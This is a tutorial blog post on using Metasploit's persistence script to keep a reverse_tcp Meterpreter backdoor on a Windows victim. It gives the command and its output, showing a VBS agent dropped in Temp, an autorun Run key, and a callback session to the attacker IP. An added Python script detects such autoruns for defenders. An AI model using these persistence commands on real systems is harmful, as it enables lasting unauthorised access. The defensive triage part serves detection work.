Have you ever wondered what happens if, while you are controlling a target, the connection suddenly drops for some unexpected reason? If that happens, all the effort you have put in so far can go to waste at once. To solve this problem, you can turn to a script that ships with Metasploit called persistence.
HOW TO USE PERSISTENCE
- Attacker IP address: 192.168.220.129, using port 4444.
- Victim IP address: 192.168.220.128
- Interval for automatically re-establishing the connection: 10 seconds
General command structure for running a script on the Meterpreter payload:
meterpreter > run <script> [options] [arguments]
To see the help for this script, add the -h option after the command:
meterpreter > run persistence -h
[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
Meterpreter Script for creating a persistent backdoor on a target host.
OPTIONS:
-A Automatically start a matching exploit/multi/handler to connect to the agent
-L <opt> Location in target host to write payload to, if none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on which the system running Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back
For example, in this case we already have a session on the victim machine:
meterpreter > run persistence -A -U -i 10 -p 4444 -r 192.168.220.129
[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-U2II8UP88B7_20171025.2248/WIN-U2II8UP88B7_20171025.2248.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.220.129 LPORT=4444
[*] Persistent agent script is 99667 bytes long
[+] Persistent Script written to C:\Users\Phat\AppData\Local\Temp\CbDHGgFHOsu.vbs
[*] Starting connection handler at port 4444 for windows/meterpreter/reverse_tcp
[+] exploit/multi/handler started!
[*] Executing script C:\Users\Phat\AppData\Local\Temp\CbDHGgFHOsu.vbs
[+] Agent executed with PID 1716
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\COIyKTcOhguJa
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\COIyKTcOhguJa
meterpreter > [*] Meterpreter session 3 opened (192.168.220.129:4444 -> 192.168.220.128:49170) at 2017-10-25 08:22:51 -0400
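The transcript above leaves two artifacts a defender can hunt for: a script dropped in the user's Temp directory and a value under HKCU\Software\Microsoft\Windows\CurrentVersion\Run. The following is an added example (not part of the original post or of Metasploit) that triages `reg query` output for such autoruns; it assumes the Run value's data is the path of the dropped .vbs file, the function names are hypothetical, and the OneDrive and Backup Job rows are constructed.

```python
import re

# One "name  TYPE  data" row of `reg query` output (fields separated by 4 spaces).
ROW = re.compile(r"^\s{4}(?P<name>.+?)\s{4}(?P<type>REG_\w+)\s{4}(?P<data>.*)$")
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|ps1|bat|cmd)\b", re.I)
TEMP_DIR = re.compile(r"(\\AppData\\Local\\Temp\\|\\Windows\\Temp\\|%TE?MP%)", re.I)

def parse_reg_query(text):
    """Yield (key, name, data) for every value row in `reg query` output."""
    key = None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
            continue
        m = ROW.match(line)
        if m and key:
            yield key, m["name"], m["data"]

def triage_autoruns(text):
    """Flag Run-key values that start from a temp directory or run a script."""
    findings = []
    for key, name, data in parse_reg_query(text):
        if not key.lower().endswith(r"\currentversion\run"):
            continue
        reasons = []
        if TEMP_DIR.search(data):
            reasons.append("target in temp directory")
        if SCRIPT_EXT.search(data):
            reasons.append("target is a script file")
        if reasons:
            severity = "high" if len(reasons) == 2 else "review"
            findings.append({"key": key, "name": name, "data": data,
                             "severity": severity, "reasons": reasons})
    return findings

# Constructed sample: the last row reuses the value name and path shown in the
# transcript (data is assumed to be the .vbs path); the other rows are made up.
SAMPLE = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\Phat\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Backup Job    REG_SZ    C:\Tools\backup.cmd
    COIyKTcOhguJa    REG_SZ    C:\Users\Phat\AppData\Local\Temp\CbDHGgFHOsu.vbs
"""

if __name__ == "__main__":
    for f in triage_autoruns(SAMPLE):
        print(f"[{f['severity']}] {f['key']}\\{f['name']} -> {f['data']} ({', '.join(f['reasons'])})")
```

Entries marked "review" match only one signal and usually need the file itself inspected before any conclusion is drawn.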
Source: https://www.thekalitools.com/2017/10/duy-tri-kiem-soat-voi-script-persistence.html